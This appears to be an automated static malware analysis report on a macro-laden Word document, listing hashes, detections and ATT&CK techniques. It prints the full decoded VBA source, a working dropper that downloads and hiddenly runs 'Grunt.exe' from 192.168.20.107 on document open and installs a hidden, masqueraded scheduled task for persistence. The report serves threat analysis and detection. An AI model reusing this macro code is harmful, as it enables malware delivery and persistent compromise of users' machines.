Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 70f736f82bba33b3…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 18.9 KB
Created: 2021-07-09 02:53:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-07-13
MD5: 0bd740d636a32c1f39de35855c91f685
SHA-1: bec2c94d9b04b4b68e2d3c29b184a1132a900301
SHA-256: 70f736f82bba33b3b1cf7933a0302cffbcd9740d7a55b90772c7aa9360078db0
Risk score: 358

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The AutoOpen macro calls a function that downloads a payload named 'Grunt.exe' from the URL embedded in the macro, saves it to the user's TEMP directory, and runs it with Shell(); it then attempts to establish persistence by registering a scheduled task. The ClamAV detection 'Doc.Downloader.Valyria-10002610-0' further confirms its malicious nature.

Heuristics (9)

  • ClamAV: Doc.Downloader.Valyria-10002610-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10002610-0
  • VBA project inside OOXML [medium, 6 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell path, vbHide
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, and the rule fires even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        oStream.Write WinHttpReq.responseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        Sub AutoOpen()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        path = Environ("TEMP") & "\" & Payload
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Note: the schemas.microsoft.com and schemas.openxmlformats.org entries below are OOXML XML-namespace identifiers rather than network endpoints; the only remote host the macro contacts is http://192.168.20.107.
    • http://192.168.20.107 — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex — Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink — Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cex — Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid — Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — Referenced by macro

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3671 bytes
SHA-256: 8d64f908d7e64329fe6a8d7fd6617d3cc9d641cffd89518f898628708f208c4a
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
    'Define our malicious execution
    Dim Payload As String
    Payload = "Grunt.exe"
    Dim Server As String
    Server = "http://192.168.20.107"
    Dim path As String
    path = Download(Server, Payload)
    Shell path, vbHide
    Persist (path)
End Sub

Private Function Download(Server As String, Payload As String) As String
    'Download and save the payload, then return its path...
    Dim path As String
    path = Environ("TEMP") & "\" & Payload
    Dim url As String
    url = Server & "/" & Payload
    
    'Get the thing...
    Dim WinHttpReq
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", url, False
    WinHttpReq.Send
    
    'Check it was successful...
    If WinHttpReq.Status <> 200 Then
        Exit Function
    End If
    
    'Write to disk...
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile path, 2
    oStream.Close
    Download = path
    Shell path, vbHide
End Function

Private Function Persist(Payload As String)
    'Create and execute the scheduled task...
    
    'Get the COM Scheduling Service and connect
    Set service = CreateObject("Schedule.Service")
    service.Connect
    
    'Get the root folder
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    'Create a new task definition
    Dim taskDefinition
    Set taskDefinition = service.newTask(0)
    
    'Perform basic T1036 masquerading
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "Microsoft Update Service"
    regInfo.Author = "Microsoft Corporation"
    
    'Have the task run as the compromised user
    Dim principal
    Set principal = taskDefinition.principal
    principal.LogonType = 3
    
    'Define a trigger for our service
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(9)
    trigger.ID = "LogonTriggerId"
    trigger.Enabled = True
    trigger.UserId = Environ("USERDOMAIN") & "\" & Environ("USERNAME")
    trigger.Delay = "PT1M"  'Delay service execution
    
    'Get settings
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
        
    'T1158: Hidden Files and Directories (and now services)
    settings.Hidden = True
      
    'Prevent our service from timing-out
    settings.ExecutionTimeLimit = "PT0S"
    settings.AllowHardTerminate = False
      
    'Avoid duplicate services
    settings.MultipleInstances = 2
      
    'Restart our service after 1 minute if we crash
    settings.RestartInterval = "PT1M"
      
    'Restart our service many, many... many times
    settings.RestartCount = 999
      
    'Ensure our service runs, regardless of the battery status
    settings.StopIfGoingOnBatteries = False
    settings.DisallowStartIfOnBatteries = False
    
    'Define our service's action
    Dim Action
    Set Action = taskDefinition.Actions.Create(0)
    Action.path = Payload
    
    'Register our task
    Dim task
    Set task = rootFolder.RegisterTaskDefinition("Microsoft Update Service", taskDefinition, 6, , , 3)
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 15360 bytes
SHA-256: 9a696ea3f242b6c98c651b0624c966e18048fe0f543db6be3a03ac0729915777
Detection: ClamAV: Doc.Downloader.Valyria-10002610-0
Obfuscation or payload: unlikely